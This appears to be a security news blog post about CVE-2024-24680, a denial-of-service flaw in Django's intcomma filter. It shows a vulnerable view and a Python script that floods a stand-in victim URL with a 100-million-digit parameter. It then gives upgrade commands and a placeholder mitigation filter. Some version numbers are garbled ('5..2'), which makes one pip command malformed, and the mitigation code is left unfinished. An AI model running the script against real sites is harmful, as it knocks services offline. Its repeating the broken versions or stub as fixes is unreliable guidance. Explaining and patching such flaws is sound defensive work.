CVE CyberSecurity Database News

CVE-2024-24680 - Django `intcomma` Filter Vulnerability Could Lead To Denial-of-Service (DoS) In Your App

Poster -

If your website or web service is powered by Django and you like to display numbers in a more human-friendly way with commas (like 1,000,000), you may run into a hidden danger. A recent security issue, assigned CVE-2024-24680, affects the commonly used intcomma template filter in Django. If left unpatched, it could allow anyone―even an unregistered visitor―to take down your Django app using a simple crafted string.

Let's break down what happened, see how it can be exploited, and how you can fix or work around this issue right now.

5..2

- Reference: Django Security Advisory
- CVE: CVE-2024-24680

What Is intcomma And Why Is It Risky?

The intcomma filter is a Django template tool that formats numbers with proper comma separators. Example:

{{ 1234567|intcomma }}

outputs

1,234,567

But the bug in affected versions happens when you pass very long strings to this filter. The intcomma implementation was not prepared to handle these huge inputs efficiently. If someone intentionally feeds your site a massive (for example, hundreds of megabytes long) string, the filter will try to process and format it, eating up a ton of memory and CPU.

That can quickly bring down your website ― this is a classic denial-of-service (DoS).

Suppose you have a Django template like this

<p>{{ value|intcomma }}</p>

If value comes direct from user input (for example, via a form or query parameter), an attacker could POST or GET a value comprised of millions of numbers, for example:

111111... (repeated several million times)

When the template renders, intcomma tries to format this gigantic string, causing server resources to spike.

Here’s a minimal view to demonstrate the risk

# views.py
from django.shortcuts import render
from django.http import HttpRequest

def risky_view(request: HttpRequest):
    value = request.GET.get('amount', '')
    return render(request, "show_amount.html", {"value": value})

And your template

<!-- templates/show_amount.html -->
{{ value|intcomma }}

Now, visit

/yourpage/?amount=1<very,very,long_number_here>

That single request can bring your backend to its knees!

Here’s a quick Python script to test the DoS exploit against a vulnerable Django site

import requests

long_number = '9' * 100_000_000  # 100 million digits
payload = {'amount': long_number}
url = 'https://victim-site.example.com/risky-page/';

response = requests.get(url, params=payload, timeout=10)
print("Status Code:", response.status_code)

This can cause your server to hang or run out of memory, especially if several requests are made at once.

Run one of

pip install --upgrade "django>=3.2.24,<3.3"
# or
pip install --upgrade "django>=4.2.10,<4.3"
# or
pip install --upgrade "django>=5..2"

See official security notes:
- Django 3.2.24 Release Notes
- Django 4.2.10 Release Notes
- Django 5..2 Release Notes

Example

from django import template

register = template.Library()

@register.filter
def safe_intcomma(value):
    value_str = str(value)
    if len(value_str) > 50:
        return value  # Or some warning/error string
    # (Your intcomma implementation here)

Final Thoughts

Vulnerabilities like CVE-2024-24680 remind us it’s not just fancy features, but tiny helpers like intcomma that attackers can twist to break your app. Applying security updates is the only real fix. While this might sound like a corner case, public sites and APIs are constant targets.

Official announcement:

Django Security Advisory - CVE-2024-24680

Patch Details on GitHub:

Django Commit Fixing intcomma

NVD entry:

CVE-2024-24680


Stay updated, stay safe!
If you found this helpful, consider sharing with friends and colleagues who use Django.

Timeline

Published on: 02/06/2024 22:16:15 UTC
Last modified on: 04/20/2024 03:15:06 UTC